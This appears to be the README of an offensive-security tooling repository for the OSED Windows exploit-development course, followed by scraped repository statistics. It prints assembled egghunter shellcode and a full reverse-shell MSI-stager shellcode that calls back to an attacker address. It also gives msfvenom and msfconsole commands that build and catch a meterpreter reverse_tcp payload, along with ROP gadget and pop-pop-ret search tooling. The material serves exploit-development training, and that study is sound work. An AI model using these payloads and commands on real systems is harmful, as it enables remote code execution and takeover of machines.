osed-scripts
bespoke tooling for offensive security's Windows Usermode Exploit Dev course (OSED)
Table of Contents
Standalone Scripts
egghunter.py
requires keystone-engine
usage: egghunter.py [-h] [-t TAG] [-b BAD_CHARS [BAD_CHARS ...]] [-s]
Creates an egghunter compatible with the OSED lab VM
optional arguments:
-h, --help show this help message and exit
-t TAG, --tag TAG tag for which the egghunter will search (default: c0d3)
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to check for in final egghunter (default: 00)
-s, --seh create an seh based egghunter instead of NtAccessCheckAndAuditAlarm
generate default egghunter
./egghunter.py
[+] egghunter created!
[=] len: 35 bytes
[=] tag: c0d3c0d3
[=] ver: NtAccessCheckAndAuditAlarm
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc6\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x63\x30\x64\x33\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
generate egghunter with w00tw00t tag
./egghunter.py --tag w00t
[+] egghunter created!
[=] len: 35 bytes
[=] tag: w00tw00t
[=] ver: NtAccessCheckAndAuditAlarm
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc6\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x77\x30\x30\x74\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
generate SEH-based egghunter while checking for bad characters (does not alter the shellcode, that's to be done manually)
./egghunter.py -b 00 0a 25 26 3d --seh
[+] egghunter created!
[=] len: 69 bytes
[=] tag: c0d3c0d3
[=] ver: SEH
egghunter = b"\xeb\x2a\x59\xb8\x63\x30\x64\x33\x51\x6a\xff\x31\xdb\x64\x89\x23\x83\xe9\x04\x83\xc3\x04\x64\x89\x0b\x6a\x02\x59\x89\xdf\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xd1\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x31\xc0\xc3"
find-gadgets.py
Finds and categorizes useful gadgets. Only prints to terminal the cleanest gadgets available (minimal amount of garbage between what's searched for and the final ret instruction). All gadgets are written to a text file for further searching.
usage: find-gadgets.py [-h] -f FILES [FILES ...] [-b BAD_CHARS [BAD_CHARS ...]] [-o OUTPUT]
Searches for clean, categorized gadgets from a given list of files
optional arguments:
-h, --help show this help message and exit
-f FILES [FILES ...], --files FILES [FILES ...]
space separated list of files from which to pull gadgets (optionally, add base address (libspp.dll:0x10000000))
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to omit from gadgets (default: 00)
-o OUTPUT, --output OUTPUT
name of output file where all (uncategorized) gadgets are written (default: found-gadgets.txt)
find gadgets in multiple files (one is loaded at a different offset than what the dll prefers) and omit 0x00 and 0xde from all gadgets
shellcoder.py
requires keystone-engine
Creates reverse shell with optional msi loader
usage: shellcode.py [-h] [-l LHOST] [-p LPORT] [-b BAD_CHARS [BAD_CHARS ...]] [-m] [-d] [-t] [-s]
Creates shellcodes compatible with the OSED lab VM
optional arguments:
-h, --help show this help message and exit
-l LHOST, --lhost LHOST
listening attacker system (default: 127.0.0.1)
-p LPORT, --lport LPORT
listening port of the attacker system (default: 4444)
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to check for in final egghunter (default: 00)
-m, --msi use an msf msi exploit stager (short)
-d, --debug-break add a software breakpoint as the first shellcode instruction
-t, --test-shellcode test the shellcode on the system
-s, --store-shellcode
store the shellcode in binary format in the file shellcode.bin
❯ python3 shellcode.py --msi -l 192.168.49.88 -s
[+] shellcode created!
[=] len: 251 bytes
[=] lhost: 192.168.49.88
[=] lport: 4444
[=] break: breakpoint disabled
[=] ver: MSI stager
[=] Shellcode stored in: shellcode.bin
[=] help:
Create msi payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.49.88 LPORT=443 -f msi -o X
Start http server (hosting the msi file):
sudo python -m SimpleHTTPServer 4444
Start the metasploit listener:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.49.88; set LPORT 443; exploit"
Remove bad chars with msfvenom (use --store-shellcode flag):
cat shellcode.bin | msfvenom --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f python -v shellcode
shellcode = b"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e\x0e\xec\xff\x55\x04\x89\x45\x14\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x72\x74\x2e\x64\x68\x6d\x73\x76\x63\x54\xff\x55\x14\x89\xc3\x68\xa7\xad\x2f\x69\xff\x55\x04\x89\x45\x18\x31\xc0\x66\xb8\x71\x6e\x50\x68\x2f\x58\x20\x2f\x68\x34\x34\x34\x34\x68\x2e\x36\x34\x3a\x68\x38\x2e\x34\x39\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x2f\x69\x20\x68\x68\x78\x65\x63\x20\x68\x6d\x73\x69\x65\x54\xff\x55\x18\x31\xc9\x51\x6a\xff\xff\x55\x10"
****
install-mona.sh
downloads all components necessary to install mona and prompts you to use an admin shell on the windows box to finish installation.
❯ ./install-mona.sh 192.168.XX.YY
[+] once the RDP window opens, execute the following command in an Administrator terminal:
powershell -c "cat \\tsclient\mona-share\install-mona.ps1 | powershell -"
[=] downloading https://github.com/corelan/windbglib/raw/master/pykd/pykd.zip
[=] downloading https://github.com/corelan/windbglib/raw/master/windbglib.py
[=] downloading https://github.com/corelan/mona/raw/master/mona.py
[=] downloading https://www.python.org/ftp/python/2.7.17/python-2.7.17.msi
[=] downloading https://download.microsoft.com/download/2/E/6/2E61CFA4-993B-4DD4-91DA-3737CD5CD6E3/vcredist_x86.exe
[=] downloading https://raw.githubusercontent.com/epi052/osed-scripts/main/install-mona.ps1
Autoselecting keyboard map 'en-us' from locale
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request
WinDbg Scripts
all windbg scripts require pykd
run .load pykd then !py c:\path\to\this\repo\script.py
find-ppr.py
Search for pop r32; pop r32; ret instructions by module name
!py find-ppr.py libspp diskpls
[+] diskpls::0x004313ad: pop ecx; pop ecx; ret
[+] diskpls::0x004313e3: pop ecx; pop ecx; ret
[+] diskpls::0x00417af6: pop ebx; pop ecx; ret
...
[+] libspp::0x1008a538: pop ebx; pop ecx; ret
[+] libspp::0x1008ae39: pop ebx; pop ecx; ret
[+] libspp::0x1008aebf: pop ebx; pop ecx; ret
...
117 Jan 09, 2023
10 Jun 13, 2022
2k Jan 05, 2023
23.2k Jan 07, 2023
116 Dec 27, 2022
1 Jan 31, 2022
115 Jan 02, 2023
51 Nov 10, 2022
645 Dec 29, 2022
30 Dec 17, 2022
[email protected]">
37 Sep 29, 2022
408 Nov 30, 2022
4 Sep 07, 2022
51 Dec 13, 2022
5 Nov 12, 2022
86 Dec 13, 2022
479 Dec 26, 2022
50 Nov 09, 2022
83 Dec 14, 2022
117 Dec 28, 2022